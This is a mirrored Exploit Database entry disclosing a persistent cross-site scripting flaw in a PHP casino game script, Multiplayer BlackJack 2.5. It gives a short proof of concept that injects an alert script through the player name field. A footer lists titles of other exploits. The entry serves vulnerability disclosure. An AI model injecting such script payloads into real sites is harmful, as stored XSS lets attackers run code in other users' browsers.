Multiplayer BlackJack Online Casino Game 2.5 – Cross-Site Scripting

Exploit Database
87 阅读

作者： L0RD

日期： 2018-05-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44627/

# Exploit Title: Multiplayer BlackJack - Online Casino Game 2.5 - Persistent Cross-Site scripting
# Date: 2018-05-16
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/multiplayer-blackjack-online-casino-game/15411706?s_rank=1628
# CVE: N/A
# Version: 2.5

# Description : Multiplayer BlackJack - Online Casino Game script has persistent cross site scripting that attacker
#can set malicious payload into the vulnerable parameter.

# POC :
1) click on the "sit" button in the web page
2) Put this payload into the "name" input and set wallet number :
<script>alert(document.domain)</script>
3) You will get an alert box in the page .

last Exploits
Multiplayer BlackJack Online Casino Game 2.5 – Cross-Site Scripting的更多信息

Exam Form Submission System 1.0 – SQL Injection Authentication Bypass：
Polycom IP Phone – Web Interface Data Disclosure：
vBulletin vBSEO 4.x – ‘visitormessage.php’ Remote Code Injection：
Joomla! Component JVideoClip 1.5.1 – ‘uid’ SQL Injection：
DLINK DPH-400SE – Exposure of Sensitive Information：
E-Sic Software livre CMS – ‘cpfcnpj’ SQL Injection：
Bigware Shop 2.1x – ‘main_bigware_54.php’ SQL Injection：
Datetopia Match Agency BiZ – Multiple Cross-Site Scripting Vulnerabilities：